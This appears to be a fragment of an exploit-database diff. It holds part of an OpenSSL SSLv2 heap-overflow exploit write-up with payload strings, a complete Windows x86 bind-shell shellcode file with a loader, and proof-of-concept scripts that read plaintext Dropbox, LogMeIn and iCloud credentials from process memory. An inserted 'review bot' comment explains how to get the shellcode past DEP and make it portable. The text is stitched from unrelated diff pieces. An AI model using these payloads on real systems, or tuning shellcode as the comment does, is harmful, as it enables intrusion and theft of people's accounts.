"AAAA" /* int compress_meth; */
|
||||
"\x00\x00\x00\x00" /* SSL_CIPHER *cipher; */
|
||||
"AAAA" /* unsigned long cipher_id; */
|
||||
"\x00\x00\x00\x00" /* STACK_OF(SSL_CIPHER) *ciphers; */
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00" /* CRYPTO_EX_DATA ex_data; */
|
||||
"AAAAAAAA" /* struct ssl_session_st *prev,*next; */
|
||||
"\x00\x00\x00\x00" /* Size of previous chunk */
|
||||
"\x11\x00\x00\x00" /* Size of chunk, in bytes */
|
||||
"fdfd" /* Forward and back pointers */
|
||||
"bkbk"
|
||||
"\x10\x00\x00\x00" /* Size of previous chunk */
|
||||
"\x10\x00\x00\x00" /* Size of chunk, PREV_INUSE is set */
|
||||
|
||||
The "A" bytes don't affect the OpenSSL control flow. The other bytes must be
|
||||
set to specific values to make the exploit work. For example, the peer and
|
||||
sess_cert pointers must be NULL, because the SSL cleanup code will call
|
||||
free() on them before it frees the SSL_SESSION structure.
|
||||
|
||||
The free() call will write the value of the bk pointer to the memory
|
||||
address in the fd pointer + 12 bytes. We'll put our shellcode address
|
||||
in the bk pointer and we'll write it to the free() entry in the GOT
|
||||
table.
|
||||
|
||||
If you don't understand how freeing this malloc chunk overwrites the GOT
|
||||
entry or don't know what the GOT table is, visit juliano's site at
|
||||
http://community.core-sdi.com/~juliano/ and read some papers.
|
||||
|
||||
|
||||
---/ Getting the Shellcode Address
|
||||
|
||||
There is only one little problem. We need a place to put our shellcode
|
||||
and we need the exact shellcode address. The trick is to use the
|
||||
SERVER_FINISHED message. This message includes the session id, which
|
||||
is read from the SSL_SESSION structure. The server reads session_id_length
|
||||
bytes from the session_id[] array and sends them to the client. We can
|
||||
overwrite the session_id_length variable and complete the handshake.
|
||||
If session_id_length is long enough, the SERVER_FINISHED message will
|
||||
include the contents of the SSL_SESSION structure.
|
||||
|
||||
To get the contents of the session structure, we'll overwrite the
|
||||
KEY_ARG array with 8 random bytes and the following string:
|
||||
|
||||
unsigned char overwrite_session_id_length[] =
|
||||
"AAAA" /* int master_key_length; */
|
||||
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char master_key[SSL_MAX_MASTER_KEY_LENGTH]; */
|
||||
"\x70\x00\x00\x00"; /* unsigned int session_id_length; */
|
||||
|
||||
Now let's imagine the heap state when we send our connection request.
|
||||
We have a heap, which contains some allocated chunks of memory and a
|
||||
large 'top' chunk, covering all free memory.
|
||||
|
||||
When the server receives the connection, it forks a child and the child
|
||||
allocates the SSL_SESSION structure. If there has not been a signifficant
|
||||
malloc/free activity, the fragmentation of the memory will be low and the
|
||||
new chunk will be allocated from the beginning of the 'top' chunk.
|
||||
|
||||
The next allocated chunk is a 16 bytes chunk which holds a
|
||||
STACK_OF(SSL_CIPHER) structure. This chunk is also allocated from the
|
||||
beginning of the 'top' chunk, so it's located right above the SSL_SESSION
|
||||
structure. The address of this chunk is stored in the session->ciphers
|
||||
variable.
|
||||
|
||||
If we're lucky, the memory would look like this:
|
||||
|
||||
| top chunk |
|
||||
|-----------|
|
||||
session->ciphers | 16 bytes | <- STACK_OF(SSL_CIPHER) structure
|
||||
points here -> |-----------|
|
||||
| 368 bytes | <- SSL_SESSION structure
|
||||
|-----------|
|
||||
|
||||
We can read the session->ciphers pointer from the SSL_SESSION structure
|
||||
in the SERVER_FINISHED message. By subtracting 368 from it, we'll get
|
||||
the address of the SSL_SESSION structure, and thus the address of
|
||||
the data we've overwritten.
|
||||
|
||||
|
||||
---/ fork() Is Your Friend
|
||||
|
||||
We'll use the same buffer overflow to get the address of the shellcode
|
||||
and to overwrite the malloc chunks. The problem is that we need to
|
||||
know the shellcode address before we send it to the server.
|
||||
|
||||
The only solution is to send 2 requests. The first request overwrites
|
||||
session_id_length and we complete the handshake to get the SERVER_FINISHED
|
||||
message. Then we adjust our shellcode and open a second connection
|
||||
which we use to send it.
|
||||
|
||||
If we're dealing with a forking server like Apache, the two children
|
||||
will have an identical memory layout and malloc() will put the
|
||||
session structure at the same address. Of course, life is never that
|
||||
simple. Apache children can handle multiple requests, which would
|
||||
change the memory allocation pattern of the two children we use.
|
||||
|
||||
To guarantee that both children are freshly spawned, our exploit
|
||||
will open a number of connections to the server before sending the
|
||||
two important requests. These connection should use up all available
|
||||
Apache children and force new ones to be spawned.
|
||||
|
||||
If the server traffic is high, the exploit might fail. If the
|
||||
memory allocation patterns are different, the exploit might fail.
|
||||
If you have a wrong GOT address, the exploit will definitely fail.
|
||||
|
||||
|
||||
---------[ How Does openssl-too-open Work? ]
|
||||
|
||||
openssl-scanner overflows the master_key_length, master_key[] and session_id_length
|
||||
variables in the SSL_SESSION structure. The first two are uninitialized at this point,
|
||||
so overwriting them has no effect on openssl. The first place where the session_id_length
|
||||
variable is used after we overwrite it is in session_finish() (ssl/s2_srvr.c:847)
|
||||
|
||||
memcpy(p,s->session->session_id, (unsigned int)s->session->session_id_length);
|
||||
|
||||
This data is returned in the SERVER_FINISHED packet. openssl-scanner checks the length
|
||||
of the data. If it matches the value we set session_id_length to, then the server is
|
||||
exploitable.
|
||||
|
||||
OpenSSL 0.9.6e and higher versions return
|
||||
192.160.0.2: Server error: SSL2_PE_UNDEFINED_ERROR (0x00) after KEY_ARG data was sent. Server is not vulnerable.
|
||||
|
||||
The updates that most vendors have put out backport the changes from 0.9.6e to 0.9.6b
|
||||
or some other version of OpenSSL. They don't return an error like 0.9.6e.
|
||||
The updated RedHat and Debian packages) would close the connection immediatelly
|
||||
after they receive the oversized KEY_ARG data, causing openssl-scanner to report
|
||||
|
||||
192.168.0.1: Connection closed after KEY_ARG data was sent. Server is most likely not vulnerable.
|
||||
|
||||
IIS servers exhibit the same behavior.
|
||||
|
||||
IIS servers that don't have a certificate set up close the connection as soon as
|
||||
they receive the CLIENT_HELLO packet. openssl-scanner reports this as
|
||||
|
||||
192.168.0.2: Connection unexpectedly closed
|
||||
|
||||
|
||||
/* EOF */
|
||||
|
||||
|
||||
|
||||
|
||||
http://www.phreedom.org/solar/exploits/apache-openssl/openssl-too-open.tar.gz
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40347.tar.gz (openssl-too-open.tar.gz)
|
|
@ -1,5 +1,5 @@
|
|||
/*
|
||||
* http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/
|
||||
* E-DB Note: Updating OpenFuck Exploit ~ http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/
|
||||
*
|
||||
* OF version r00t VERY PRIV8 spabam
|
||||
* Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
|
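--- /dev/null
+++ b/platforms/win_x86/shellcode/40352.c
@@ -0,0 +1,519 @@
+/*
+# Title : Windows x86 bind shell tcp shellcode
+# Author : Roziul Hasan Khan Shifat
+# Date : 08-09-2016
+# Tested On : Windows 7 Ultimate , Starter x86
+*/
+
+//Note: This shellcode will only works on x86
+
+/*
+section .text
+global _start
+_start:
+
+xor ecx,ecx
+mov eax,[fs:ecx+0x30] ;PEB
+mov eax,[eax+0xc] ;PEB.Ldr
+mov esi,[eax+0x14] ;PEB.Ldr->InMemOrderModuleList
+lodsd
+xchg esi,eax
+lodsd
+mov edi,[eax+0x10] ;kernel32.dll base address
+
+
+mov ebx,[edi+0x3c] ;DOS->elf_anew
+add ebx,edi ;PE HEADER
+mov ebx,[ebx+0x78]
+add ebx,edi ;kernel32 IMAGE_EXPORT_DIRECTORY
+
+
+sub esp,32
+lea esi,[esp]
+
+
+mov cx,660
+
+mov edx,[ebx+0x1c] ;AddressOfFunctions
+add edx,edi
+
+mov eax,[edx+ecx]
+add eax,edi
+
+mov [esi],dword eax ;CreateProcessA() at offset 0
+
+mov cx,1128
+
+mov eax,[edx+ecx]
+add eax,edi
+
+mov [esi+4],dword eax ;ExitProcess() at offset 4
+
+;------------------------------------
+;finding base address of ws2_32.dll
+
+mov cx,3312
+
+mov eax,[edx+ecx]
+add eax,edi
+
+xor ecx,ecx
+push 0x41416c6c
+mov [esp+2],word cx
+push 0x642e3233
+push 0x5f327377
+
+lea ebx,[esp]
+
+push ebx
+call eax
+
+;---------------------------
+mov edi,eax
+;---------------------
+mov ebx,[edi+0x3c] ;DOS->elf_anew
+add ebx,edi ;PE HEADER
+mov ebx,[ebx+0x78]
+add ebx,edi ; ws2_32.dll IMAGE_EXPORT_DIRECTORY
+
+mov edx,[ebx+0x1c] ;AddressOfFunctions
+add edx,edi
+
+xor ecx,ecx
+mov cx,456
+
+mov eax,[edx+ecx]
+add eax,edi
+
+mov [esi+8],dword eax ;WSAStartup() at offset 8
+
+mov cx,392
+
+mov eax,[edx+ecx]
+add eax,edi
+
+mov [esi+12],dword eax ;WSASocketA() at offset 12
+
+
+mov eax,[edx+4]
+add eax,edi
+
+mov [esi+16],dword eax ;bind() at offset 16
+
+mov eax,[edx+48]
+add eax,edi
+
+mov [esi+20],dword eax ;listen() at offset 20
+
+mov eax,[edx]
+add eax,edi
+
+mov [esi+24],dword eax ;accept() at offset 24
+
+mov eax,[edx+80]
+add eax,edi
+
+mov [esi+28],dword eax ;setsockopt() at offset 28
+;-------------------------------------------------
+;WSAStartup(514, &WSADATA)
+mov cx,400
+sub esp,ecx
+
+lea ebx,[esp]
+
+mov cx,514
+
+push ebx
+push ecx
+
+call dword [esi+8]
+
+
+;-----------------------------------------
+;WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,NULL,NULL)
+
+xor ecx,ecx
+
+push ecx
+push ecx
+push ecx
+
+mov cl,6
+push ecx
+
+sub ecx,5
+push ecx
+
+inc ecx
+push ecx
+
+call dword [esi+12]
+;----------------------------
+mov edi,eax ;SOCKET
+
+;----------------------------------
+;setsockopt(sock,0xffff,4,&int l=1,int j=2)
+
+cdq
+mov dl,2
+
+push edx
+dec edx
+
+push edx
+lea ecx,[esp]
+
+mov dl,4
+
+push ecx
+push edx
+
+mov dx,0xffff
+push edx
+push edi
+
+call dword [esi+28]
+
+
+;--------------------------------------------
+;bind(SOCKET,(struct sockaddr *)&struct sockaddr_in,16);
+
+cdq
+
+push edx
+push edx
+push edx
+push edx
+
+mov [esp],byte 2
+mov [esp+2],word 0x5c11 ;port 4444
+
+lea ecx,[esp]
+mov dl,16
+
+push edx
+push ecx
+push edi
+
+call dword [esi+16]
+
+;--------------------------------
+;listen(SOCKET,1);
+cdq
+inc edx
+push edx
+push edi
+
+call dword [esi+20]
+;-----------------------------
+;accept(SOCKET,(struct sockaddr *)&struct sockaddr_in,&16);
+
+cdq
+push edx
+push edx
+push edx
+push edx
+mov dl,16
+lea ecx,[esp]
+
+
+
+push edx
+lea ebx,[esp]
+
+push ebx
+push ecx
+push edi
+
+call dword [esi+24]
+;-----------------------
+mov edi,eax ;CLIent socket
+;-----------------------
+
+cdq
+sub esp,16
+lea ebx,[esp] ;PROCESS_INFORMATION
+
+push edi
+push edi
+push edi
+push edx
+
+push edx
+
+mov dl,255
+inc edx
+
+push edx
+cdq
+
+push edx
+push edx
+push edx
+push edx
+push edx
+
+push edx
+push edx
+push edx
+push edx
+push edx
+
+mov dl,68
+push edx
+
+lea ecx,[esp] ;STARTUPINFOA
+
+cdq
+push 0x41657865
+mov [esp+3],byte dl
+push 0x2e646d63
+
+lea eax,[esp]
+
+;---------------------------------------------
+;CreateProcessA(NULL,"cmd.exe",NULL,NULL,TRUE,0,NULL,NULL,&STARTUPINFOA,&PROCESS_INFORMATION)
+
+push ebx
+push ecx
+
+push edx
+push edx
+push edx
+
+inc edx
+push edx
+cdq
+
+push edx
+push edx
+
+push eax
+push edx
+
+call dword [esi]
+;-----------------------
+push eax
+call dword [esi+4]
+
+*/
+
+
+/*
+
+Disassembly of section .text:
+
+00000000 <_start>:
+0: 31 c9 xor %ecx,%ecx
+2: 64 8b 41 30 mov %fs:0x30(%ecx),%eax
+6: 8b 40 0c mov 0xc(%eax),%eax
+9: 8b 70 14 mov 0x14(%eax),%esi
+c: ad lods %ds:(%esi),%eax
+d: 96 xchg %eax,%esi
+e: ad lods %ds:(%esi),%eax
+f: 8b 78 10 mov 0x10(%eax),%edi
+12: 8b 5f 3c mov 0x3c(%edi),%ebx
+15: 01 fb add %edi,%ebx
+17: 8b 5b 78 mov 0x78(%ebx),%ebx
+1a: 01 fb add %edi,%ebx
+1c: 83 ec 20 sub $0x20,%esp
+1f: 8d 34 24 lea (%esp),%esi
+22: 66 b9 94 02 mov $0x294,%cx
+26: 8b 53 1c mov 0x1c(%ebx),%edx
+29: 01 fa add %edi,%edx
+2b: 8b 04 0a mov (%edx,%ecx,1),%eax
+2e: 01 f8 add %edi,%eax
+30: 89 06 mov %eax,(%esi)
+32: 66 b9 68 04 mov $0x468,%cx
+36: 8b 04 0a mov (%edx,%ecx,1),%eax
+39: 01 f8 add %edi,%eax
+3b: 89 46 04 mov %eax,0x4(%esi)
+3e: 66 b9 f0 0c mov $0xcf0,%cx
+42: 8b 04 0a mov (%edx,%ecx,1),%eax
+45: 01 f8 add %edi,%eax
+47: 31 c9 xor %ecx,%ecx
+49: 68 6c 6c 41 41 push $0x41416c6c
+4e: 66 89 4c 24 02 mov %cx,0x2(%esp)
+53: 68 33 32 2e 64 push $0x642e3233
+58: 68 77 73 32 5f push $0x5f327377
+5d: 8d 1c 24 lea (%esp),%ebx
+60: 53 push %ebx
+61: ff d0 call *%eax
+63: 89 c7 mov %eax,%edi
+65: 8b 5f 3c mov 0x3c(%edi),%ebx
+68: 01 fb add %edi,%ebx
+6a: 8b 5b 78 mov 0x78(%ebx),%ebx
+6d: 01 fb add %edi,%ebx
+6f: 8b 53 1c mov 0x1c(%ebx),%edx
+72: 01 fa add %edi,%edx
+74: 31 c9 xor %ecx,%ecx
+76: 66 b9 c8 01 mov $0x1c8,%cx
+7a: 8b 04 0a mov (%edx,%ecx,1),%eax
+7d: 01 f8 add %edi,%eax
+7f: 89 46 08 mov %eax,0x8(%esi)
+82: 66 b9 88 01 mov $0x188,%cx
+86: 8b 04 0a mov (%edx,%ecx,1),%eax
+89: 01 f8 add %edi,%eax
+8b: 89 46 0c mov %eax,0xc(%esi)
+8e: 8b 42 04 mov 0x4(%edx),%eax
+91: 01 f8 add %edi,%eax
+93: 89 46 10 mov %eax,0x10(%esi)
+96: 8b 42 30 mov 0x30(%edx),%eax
+99: 01 f8 add %edi,%eax
+9b: 89 46 14 mov %eax,0x14(%esi)
+9e: 8b 02 mov (%edx),%eax
+a0: 01 f8 add %edi,%eax
+a2: 89 46 18 mov %eax,0x18(%esi)
+a5: 8b 42 50 mov 0x50(%edx),%eax
+a8: 01 f8 add %edi,%eax
+aa: 89 46 1c mov %eax,0x1c(%esi)
+ad: 66 b9 90 01 mov $0x190,%cx
+b1: 29 cc sub %ecx,%esp
+b3: 8d 1c 24 lea (%esp),%ebx
+b6: 66 b9 02 02 mov $0x202,%cx
+ba: 53 push %ebx
+bb: 51 push %ecx
+bc: ff 56 08 call *0x8(%esi)
+bf: 31 c9 xor %ecx,%ecx
+c1: 51 push %ecx
+c2: 51 push %ecx
+c3: 51 push %ecx
+c4: b1 06 mov $0x6,%cl
+c6: 51 push %ecx
+c7: 83 e9 05 sub $0x5,%ecx
+ca: 51 push %ecx
+cb: 41 inc %ecx
+cc: 51 push %ecx
+cd: ff 56 0c call *0xc(%esi)
+d0: 89 c7 mov %eax,%edi
+d2: 99 cltd
+d3: b2 02 mov $0x2,%dl
+d5: 52 push %edx
+d6: 4a dec %edx
+d7: 52 push %edx
+d8: 8d 0c 24 lea (%esp),%ecx
+db: b2 04 mov $0x4,%dl
+dd: 51 push %ecx
+de: 52 push %edx
+df: 66 ba ff ff mov $0xffff,%dx
+e3: 52 push %edx
+e4: 57 push %edi
+e5: ff 56 1c call *0x1c(%esi)
+e8: 99 cltd
+e9: 52 push %edx
+ea: 52 push %edx
+eb: 52 push %edx
+ec: 52 push %edx
+ed: c6 04 24 02 movb $0x2,(%esp)
+f1: 66 c7 44 24 02 11 5c movw $0x5c11,0x2(%esp)
+f8: 8d 0c 24 lea (%esp),%ecx
+fb: b2 10 mov $0x10,%dl
+fd: 52 push %edx
+fe: 51 push %ecx
+ff: 57 push %edi
+100: ff 56 10 call *0x10(%esi)
+103: 99 cltd
+104: 42 inc %edx
+105: 52 push %edx
+106: 57 push %edi
+107: ff 56 14 call *0x14(%esi)
+10a: 99 cltd
+10b: 52 push %edx
+10c: 52 push %edx
+10d: 52 push %edx
+10e: 52 push %edx
+10f: b2 10 mov $0x10,%dl
+111: 8d 0c 24 lea (%esp),%ecx
+114: 52 push %edx
+115: 8d 1c 24 lea (%esp),%ebx
+118: 53 push %ebx
+119: 51 push %ecx
+11a: 57 push %edi
+11b: ff 56 18 call *0x18(%esi)
+11e: 89 c7 mov %eax,%edi
+120: 99 cltd
+121: 83 ec 10 sub $0x10,%esp
+124: 8d 1c 24 lea (%esp),%ebx
+127: 57 push %edi
+128: 57 push %edi
+129: 57 push %edi
+12a: 52 push %edx
+12b: 52 push %edx
+12c: b2 ff mov $0xff,%dl
+12e: 42 inc %edx
+12f: 52 push %edx
+130: 99 cltd
+131: 52 push %edx
+132: 52 push %edx
+133: 52 push %edx
+134: 52 push %edx
+135: 52 push %edx
+136: 52 push %edx
+137: 52 push %edx
+138: 52 push %edx
+139: 52 push %edx
+13a: 52 push %edx
+13b: b2 44 mov $0x44,%dl
+13d: 52 push %edx
+13e: 8d 0c 24 lea (%esp),%ecx
+141: 99 cltd
+142: 68 65 78 65 41 push $0x41657865
+147: 88 54 24 03 mov %dl,0x3(%esp)
+14b: 68 63 6d 64 2e push $0x2e646d63
+150: 8d 04 24 lea (%esp),%eax
+153: 53 push %ebx
+154: 51 push %ecx
+155: 52 push %edx
+156: 52 push %edx
+157: 52 push %edx
+158: 42 inc %edx
+159: 52 push %edx
+15a: 99 cltd
+15b: 52 push %edx
+15c: 52 push %edx
+15d: 50 push %eax
+15e: 52 push %edx
+15f: ff 16 call *(%esi)
+161: 50 push %eax
+162: ff 56 04 call *0x4(%esi)
+*/
+
+
+#include<windows.h>
+#include<stdio.h>
+#include<shellapi.h>
+#include<stdlib.h>
+
+char shellcode[]=\
+
+"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x78\x10\x8b\x5f\x3c\x01\xfb\x8b\x5b\x78\x01\xfb\x83\xec\x20\x8d\x34\x24\x66\xb9\x94\x02\x8b\x53\x1c\x01\xfa\x8b\x04\x0a\x01\xf8\x89\x06\x66\xb9\x68\x04\x8b\x04\x0a\x01\xf8\x89\x46\x04\x66\xb9\xf0\x0c\x8b\x04\x0a\x01\xf8\x31\xc9\x68\x6c\x6c\x41\x41\x66\x89\x4c\x24\x02\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x8d\x1c\x24\x53\xff\xd0\x89\xc7\x8b\x5f\x3c\x01\xfb\x8b\x5b\x78\x01\xfb\x8b\x53\x1c\x01\xfa\x31\xc9\x66\xb9\xc8\x01\x8b\x04\x0a\x01\xf8\x89\x46\x08\x66\xb9\x88\x01\x8b\x04\x0a\x01\xf8\x89\x46\x0c\x8b\x42\x04\x01\xf8\x89\x46\x10\x8b\x42\x30\x01\xf8\x89\x46\x14\x8b\x02\x01\xf8\x89\x46\x18\x8b\x42\x50\x01\xf8\x89\x46\x1c\x66\xb9\x90\x01\x29\xcc\x8d\x1c\x24\x66\xb9\x02\x02\x53\x51\xff\x56\x08\x31\xc9\x51\x51\x51\xb1\x06\x51\x83\xe9\x05\x51\x41\x51\xff\x56\x0c\x89\xc7\x99\xb2\x02\x52\x4a\x52\x8d\x0c\x24\xb2\x04\x51\x52\x66\xba\xff\xff\x52\x57\xff\x56\x1c\x99\x52\x52\x52\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x11\x5c\x8d\x0c\x24\xb2\x10\x52\x51\x57\xff\x56\x10\x99\x42\x52\x57\xff\x56\x14\x99\x52\x52\x52\x52\xb2\x10\x8d\x0c\x24\x52\x8d\x1c\x24\x53\x51\x57\xff\x56\x18\x89\xc7\x99\x83\xec\x10\x8d\x1c\x24\x57\x57\x57\x52\x52\xb2\xff\x42\x52\x99\x52\x52\x52\x52\x52\x52\x52\x52\x52\x52\xb2\x44\x52\x8d\x0c\x24\x99\x68\x65\x78\x65\x41\x88\x54\x24\x03\x68\x63\x6d\x64\x2e\x8d\x04\x24\x53\x51\x52\x52\x52\x42\x52\x99\x52\x52\x50\x52\xff\x16\x50\xff\x56\x04";
+
+int main(int i,char *a[])
+{
+
+int mode;
+
+
+
+if(i==1)
+mode=1;
+else
+mode=atoi(a[1]);
+
+switch(mode)
+{
+case 1:
+ShellExecute(NULL,NULL,a[0],"78",NULL,0);
+break;
+
+case 78:
+(* (int(*)())shellcode )();
+break;
+
+default:
+break;
+}
+
+
+return 0;
+}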
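Review bot: `(* (int(*)())shellcode )();` in `main` jumps into a `char` array that lives in the writable data section, so on a DEP-enabled build the call faults before the payload runs; copy the bytes into an executable mapping first, e.g. `void *p = VirtualAlloc(NULL, sizeof shellcode, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); memcpy(p, shellcode, sizeof shellcode); ((void (*)())p)();`. Every API is also resolved by a fixed byte offset into AddressOfFunctions (`mov cx,660`, `mov cx,1128`, `mov cx,3312` in kernel32, then 456/392/4/48/0/80 in ws2_32.dll), i.e. by export ordinal, which is only valid for the exact kernel32/ws2_32 builds behind the "Tested On" line; a lookup over AddressOfNames/AddressOfNameOrdinals (or a name hash) is what makes such a stub portable, and at minimum a comment that the ordinals are build-specific belongs next to `mov cx,660`. In the setsockopt block the `1` pushed after `dec edx` is both the value `lea ecx,[esp]` points at and the fifth argument, so optlen is 1 rather than sizeof(int), which the Winsock documentation lists as a WSAEFAULT condition, and because no return value of any call is checked that failure (or a failed bind on a busy port 4444) goes unnoticed. The two `;DOS->elf_anew` comments should read `e_lfanew`, and `InMemOrderModuleList` should be `InMemoryOrderModuleList`.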
@ -1,242 +0,0 @@
|
|||
#####
|
||||
# Dropbox Desktop Client v9.4.49 (64bit) Local Credentials Disclosure
|
||||
# Tested on Windows Windows Server 2012 R2 64bit, English
|
||||
# Vendor Homepage @ https://www.dropbox.com
|
||||
# Date 06/09/2016
|
||||
# Bug Discovery by:
|
||||
#
|
||||
# Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
|
||||
# http://www.black-rose.ml
|
||||
#
|
||||
# Viktor Minin (https://www.linkedin.com/in/MininViktor)
|
||||
# https://1-33-7.com/
|
||||
#
|
||||
# Alexander Korznikov (https://www.linkedin.com/in/nopernik)
|
||||
# http://korznikov.com/
|
||||
#
|
||||
#####
|
||||
# Dropbox Desktop Client v9.4.49 is vulnerable to local credentials disclosure, the supplied username and password are stored in a plaintext format in memory process.
|
||||
# A potential attacker could reveal the supplied username and password in order to gain access to account.
|
||||
#####
|
||||
# Proof-Of-Concept Code:
|
||||
|
||||
import time
|
||||
import urllib
|
||||
from winappdbg import Debug, Process
|
||||
|
||||
username = ''
|
||||
password = ''
|
||||
found = 0
|
||||
filename = "Dropbox.exe"
|
||||
process_pid = 0
|
||||
memory_dump = []
|
||||
|
||||
debug = Debug()
|
||||
try:
|
||||
print "[~] Searching for pid by process name '%s'.." % (filename)
|
||||
time.sleep(1)
|
||||
debug.system.scan_processes()
|
||||
for (process, process_name) in debug.system.find_processes_by_filename(filename):
|
||||
process_pid = process.get_pid()
|
||||
if process_pid is not 0:
|
||||
print "[+] Found process with pid #%d" % (process_pid)
|
||||
time.sleep(1)
|
||||
print "[~] Trying to read memory for pid #%d" % (process_pid)
|
||||
|
||||
process = Process(process_pid)
|
||||
for address in process.search_bytes('\x26\x70\x61\x73\x73\x77\x6F\x72\x64\x3D'):
|
||||
memory_dump.append(process.read(address,100))
|
||||
for i in range(len(memory_dump)):
|
||||
email_addr = memory_dump[i].split('email=')[1]
|
||||
tmp_passwd = memory_dump[i].split('password=')[1]
|
||||
username = email_addr.split('\x00')[0]
|
||||
password = tmp_passwd.split('&is_sso_link=')[0]
|
||||
if username != '' and password !='':
|
||||
found = 1
|
||||
print "[+] Credentials found!\r\n----------------------------------------"
|
||||
print "[+] Username: %s" % urllib.unquote_plus(username)
|
||||
print "[+] Password: %s" % password
|
||||
if found == 0:
|
||||
print "[-] Credentials not found! Make sure the client is connected."
|
||||
else:
|
||||
print "[-] No process found with name '%s'." % (filename)
|
||||
|
||||
debug.loop()
|
||||
finally:
|
||||
debug.stop()
|
||||
|
||||
|
||||
|
||||
######################################################################
|
||||
|
||||
#####
|
||||
# LogMeIn Client v1.3.2462 (64bit) Local Credentials Disclosure
|
||||
# Tested on Windows Windows Server 2012 R2 64bit, English
|
||||
# Vendor Homepage @ https://secure.logmein.com/home/en
|
||||
# Date 06/09/2016
|
||||
# Bug Discovery by:
|
||||
#
|
||||
# Alexander Korznikov (https://www.linkedin.com/in/nopernik)
|
||||
# http://korznikov.com/
|
||||
#
|
||||
# Viktor Minin (https://www.linkedin.com/in/MininViktor)
|
||||
# https://1-33-7.com/
|
||||
#
|
||||
# Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
|
||||
# http://www.black-rose.ml
|
||||
#
|
||||
#####
|
||||
# LogMeIn Client v1.3.2462 is vulnerable to local credentials disclosure, the supplied username and password are stored in a plaintext format in memory process.
|
||||
# A potential attacker could reveal the supplied username and password in order to gain access to account and associated computers.
|
||||
#####
|
||||
# Proof-Of-Concept Code:
|
||||
|
||||
import time
|
||||
import urllib
|
||||
from winappdbg import Debug, Process
|
||||
|
||||
username = ''
|
||||
password = ''
|
||||
found = 0
|
||||
filename = "LMIIgnition.exe"
|
||||
process_pid = 0
|
||||
memory_dump = []
|
||||
|
||||
debug = Debug()
|
||||
try:
|
||||
print "[~] Searching for pid by process name '%s'.." % (filename)
|
||||
time.sleep(1)
|
||||
debug.system.scan_processes()
|
||||
for (process, process_name) in debug.system.find_processes_by_filename(filename):
|
||||
process_pid = process.get_pid()
|
||||
if process_pid is not 0:
|
||||
print "[+] Found process with pid #%d" % (process_pid)
|
||||
time.sleep(1)
|
||||
print "[~] Trying to read memory for pid #%d" % (process_pid)
|
||||
|
||||
process = Process(process_pid)
|
||||
for address in process.search_bytes('\x26\x5F\x5F\x56\x49\x45\x57\x53\x54\x41\x54\x45\x3D'):
|
||||
memory_dump.append(process.read(address,150))
|
||||
for i in range(len(memory_dump[0])):
|
||||
email_addr = memory_dump[i].split('email=')[1]
|
||||
tmp_passwd = memory_dump[i].split('password=')[1]
|
||||
username = email_addr.split('&hiddenEmail=')[0]
|
||||
password = tmp_passwd.split('&rememberMe=')[0]
|
||||
if username != '' and password !='':
|
||||
found = 1
|
||||
print "[+] Credentials found!\r\n----------------------------------------"
|
||||
print "[+] Username: %s" % urllib.unquote_plus(username)
|
||||
print "[+] Password: %s" % password
|
||||
break
|
||||
if found == 0:
|
||||
print "[-] Credentials not found! Make sure the client is connected."
|
||||
else:
|
||||
print "[-] No process found with name '%s'." % (filename)
|
||||
|
||||
debug.loop()
|
||||
finally:
|
||||
debug.stop()
|
||||
|
||||
|
||||
|
||||
######################################################################
|
||||
|
||||
#####
|
||||
# Apple iCloud Desktop Client v5.2.1.0 Local Credentials Disclosure After Sign Out Exploit
|
||||
# Tested on Windows Windows 7 64bit, English
|
||||
# Vendor Homepage @ https://www.apple.com/
|
||||
# Product Homepage @ https://support.apple.com/en-us/HT204283
|
||||
# Date 07/09/2016
|
||||
# Bug Discovery by:
|
||||
#
|
||||
# Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
|
||||
# http://www.black-rose.ml
|
||||
#
|
||||
# Viktor Minin (https://www.linkedin.com/in/MininViktor)
|
||||
# https://1-33-7.com/
|
||||
#
|
||||
# Alexander Korznikov (https://www.linkedin.com/in/nopernik)
|
||||
# http://korznikov.com/
|
||||
#
|
||||
#####
|
||||
# Apple iCloud Desktop Client v5.2.1.0 is vulnerable to local credentials disclosure after the user is logged out.
|
||||
# It seems that iCloud does not store the supplied credentials while the user is logged in, but after sign out the supplied username and password are stored in a plaintext format in memory process.
|
||||
# Funny eh?!
|
||||
# A potential attacker could reveal the supplied username and password in order to gain access to iCloud account.
|
||||
#
|
||||
# Authors are not responsible for any misuse or demage which caused by use of this script code.
|
||||
# Please use responsibly.
|
||||
#####
|
||||
# Proof-Of-Concept Code:
|
||||
|
||||
import time
|
||||
import urllib
|
||||
from winappdbg import Debug, Process
|
||||
|
||||
def b2h(str):
|
||||
return ''.join(["%02X " % ord(x) for x in str]).strip()
|
||||
|
||||
def h2b(str):
|
||||
bytes = []
|
||||
str = ''.join(str.split(" "))
|
||||
for i in range(0, len(str), 2):
|
||||
bytes.append(chr(int(str[i:i+2], 16)))
|
||||
return ''.join(bytes)
|
||||
|
||||
usr = ''
|
||||
pwd = ''
|
||||
found = 0
|
||||
filename = "iCloud.exe"
|
||||
process_pid = 0
|
||||
memory_dump = []
|
||||
|
||||
debug = Debug()
|
||||
try:
|
||||
print "#########################################################################"
|
||||
print "#\tApple iCloud v5.2.1.0 Local Credentials Disclosure Exploit\t#"
|
||||
print "# Bug Discovery by Yakir Wizman, Victor Minin, Alexander Korznikov\t#"
|
||||
print "#\t\tTested on Windows Windows 7 64bit, English\t\t#"
|
||||
print "#\t\t\tPlease use responsibly.\t\t\t\t#"
|
||||
print "#########################################################################\r\n"
|
||||
print "[~] Searching for pid by process name '%s'.." % (filename)
|
||||
time.sleep(1)
|
||||
debug.system.scan_processes()
|
||||
for (process, process_name) in debug.system.find_processes_by_filename(filename):
|
||||
process_pid = process.get_pid()
|
||||
if process_pid is not 0:
|
||||
print "[+] Found process with pid #%d" % (process_pid)
|
||||
time.sleep(1)
|
||||
